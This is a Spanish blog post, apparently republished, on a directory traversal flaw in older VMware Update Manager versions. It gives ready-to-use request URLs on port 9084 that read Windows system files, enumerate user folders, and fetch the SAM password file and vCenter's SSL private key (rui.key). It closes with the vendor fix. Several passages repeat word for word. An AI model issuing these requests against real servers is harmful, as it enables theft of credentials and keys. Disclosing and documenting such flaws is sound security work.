Se ha publicado una
vulnerabilidad descubierta en las versiones de Vmware Update Manager
inferiores a la 5. El fallo permite navegar por la estructura de
directorios del servidor mediante lo que se conoce como “Directorio
Transversal” (Directory Traversal). Afortunadamente, la vulnerabilidad
no permite ejecutar comandos pero posibilita acceder a diferentes
ficheros y directorios existentes en el servidor donde se encuentre
instalado Vmware. El error fue descubierto por Alexey Sintsov hace ya
tiempo pero no ha sido hasta este mes de noviembre de 2011 que se ha
hecho público. Para más información y ver cómo corregir la
vulnerabilidad se puede recurrir a la siguiente página oficial de
Vmware: http://www.vmware.com/security/advisories/VMSA-2011-0014.html.
Vmware Update Manager es un componente de VSphere que permite mantener actualizado el entorno virtual de Vmware. En la última versión de vSphere, la 5, sólo se actualizan los servidores ESXi y los appliances virtuales existentes pero en versiones anteriores se podían aplicar incluso parches a las diferentes máquinas virtuales Linux y Windows que había configuradas.
Vmware Update Manager puede estar instalado en el mismo servidor que el vCenter y utiliza los siguientes puertos TCP por defecto:
- 8084: SOAP
- 9084: Servidor Web
- 9087: Servidor Web con SSL
Una vulnerabilidad de Directorio Transversal consiste en poder acceder a directorios y ficheros del servidor que en teoría no son visibles o no deberían serlo. También se conoce a la vulnerabilidad como ../ o lo que es lo mismo, ataque “punto punto barra”, que es lo que se utiliza para poder escalar por la estructura de directorios y acceder a los diferentes ficheros. Más información en la página de Owasp: https://www.owasp.org/index.php/Testing_for_Path_Traversal
El servidor vCenter de hacktimes.com es la versión 4.1 y presenta la vulnerabilidad tal y como se puede observar en las siguientes capturas de pantalla:
Vmware Update Manager es un componente de VSphere que permite mantener actualizado el entorno virtual de Vmware. En la última versión de vSphere, la 5, sólo se actualizan los servidores ESXi y los appliances virtuales existentes pero en versiones anteriores se podían aplicar incluso parches a las diferentes máquinas virtuales Linux y Windows que había configuradas.
Vmware Update Manager puede estar instalado en el mismo servidor que el vCenter y utiliza los siguientes puertos TCP por defecto:
- 8084: SOAP
- 9084: Servidor Web
- 9087: Servidor Web con SSL
Una vulnerabilidad de Directorio Transversal consiste en poder acceder a directorios y ficheros del servidor que en teoría no son visibles o no deberían serlo. También se conoce a la vulnerabilidad como ../ o lo que es lo mismo, ataque “punto punto barra”, que es lo que se utiliza para poder escalar por la estructura de directorios y acceder a los diferentes ficheros. Más información en la página de Owasp: https://www.owasp.org/index.php/Testing_for_Path_Traversal
El servidor vCenter de hacktimes.com es la versión 4.1 y presenta la vulnerabilidad tal y como se puede observar en las siguientes capturas de pantalla:
Fig 1. Acceso al vCenter por el puerto 443
Para explotar la vulnerabilidad es suficiente acceder
con un navegador Web al puerto 9084 que es el que, como se ha visto
anteriormente, utiliza el servidor Web de Vmware Update Manager, y
empezar a navegar por la estructura de directorios del servidor con, en
este caso, sistema operativo MS Windows 2008 R2. Algunos ejemplos
serían:
Para poder obtener el contenido de los ficheros propios de Windows “win.ini” y “system.ini”:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/system.ini
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/win.ini
Si el archivo solicitado no existe se obtiene el típico error 404 (not found) en el navegador y si es un directorio y existe se obtiene el error 403 (forbidden). Por ejemplo, al solicitar acceder al directorio “/Program Files” el resultado es el siguiente:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Program%20files/
Para poder obtener el contenido de los ficheros propios de Windows “win.ini” y “system.ini”:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/system.ini
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/win.ini
Si el archivo solicitado no existe se obtiene el típico error 404 (not found) en el navegador y si es un directorio y existe se obtiene el error 403 (forbidden). Por ejemplo, al solicitar acceder al directorio “/Program Files” el resultado es el siguiente:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Program%20files/
Fig 2. Error 403 generado al comprobar la existencia del directorio “/Program Files”
Es posible enumerar los diferentes usuarios existentes en el servidor con peticiones similares a:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Users/Administrator/
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Users/hacktimes/
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Users/Administrator/
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Users/hacktimes/
Fig 3. Error 403 obtenido al preguntar por el directorio del usuario “administrator”
Otros ejemplos son:
Para ver el archivo /etc/host del servidor:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/System32/Drivers/etc/hosts
Para ver el archivo de registro de Windows Update:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/WindowsUpdate.log
Para ver el archivo /etc/host del servidor:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/System32/Drivers/etc/hosts
Para ver el archivo de registro de Windows Update:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Windows/WindowsUpdate.log
Fig 4. Archivo WindowsUpdate.log
Si el equipo analizado tuviera como sistema
operativo, MS Windows 2003/XP/2000/NT, es posible recuperar la
contraseña del usuario administrador, siempre que no se haya cambiado
después de la instalación inicial, con la siguiente petición:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\windows\repair\SAM
A continuación se muestran otros ejemplos con los que obtener más datos e información relativa a la configuración del vCenter:
- El fichero VPXD.CFG es un archivo XML que contiene parámetros de configuración de vCenter como, por ejemplo, la localización de los ficheros de registro (LOGs) del vCenter, el número de ellos que se almacenarán, etc.
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\ProgramData\VMware\VMware VirtualCenter\vpxd.cfg
- Archivo con la clave privada del certificado SSL del vCenter:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
La solución, tal y como se puede ver en la página de Vmware anterior, pasa por actualizar la versión de Vmare Update Manager a las versiones vCenter Update Manager 4.1 Update 2 y vCenter Update Manager 4.0 Update 4.
Es habitual centrarse en la seguridad de las diferentes máquinas virtuales (VM) y dedicar todos los esfuerzos a securizarlas pero, a menudo, se pasa por alto la seguridad del servidor físico que hace de anfitrión y de las aplicaciones que hospeda como, en este caso, el propio vCenter. En hacktimes.com ya se comentó hace tiempo, de forma genérica, otros riesgos y peligros de la virtualización (http://www.hacktimes.com/riesgos_de_la_virtualizaci_n).
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\windows\repair\SAM
A continuación se muestran otros ejemplos con los que obtener más datos e información relativa a la configuración del vCenter:
- El fichero VPXD.CFG es un archivo XML que contiene parámetros de configuración de vCenter como, por ejemplo, la localización de los ficheros de registro (LOGs) del vCenter, el número de ellos que se almacenarán, etc.
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\ProgramData\VMware\VMware VirtualCenter\vpxd.cfg
- Archivo con la clave privada del certificado SSL del vCenter:
http://hacktimes.com:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
La solución, tal y como se puede ver en la página de Vmware anterior, pasa por actualizar la versión de Vmare Update Manager a las versiones vCenter Update Manager 4.1 Update 2 y vCenter Update Manager 4.0 Update 4.
Es habitual centrarse en la seguridad de las diferentes máquinas virtuales (VM) y dedicar todos los esfuerzos a securizarlas pero, a menudo, se pasa por alto la seguridad del servidor físico que hace de anfitrión y de las aplicaciones que hospeda como, en este caso, el propio vCenter. En hacktimes.com ya se comentó hace tiempo, de forma genérica, otros riesgos y peligros de la virtualización (http://www.hacktimes.com/riesgos_de_la_virtualizaci_n).
Fuente: http://www.hacktimes.com/directorio_transversal/
No hay comentarios:
Publicar un comentario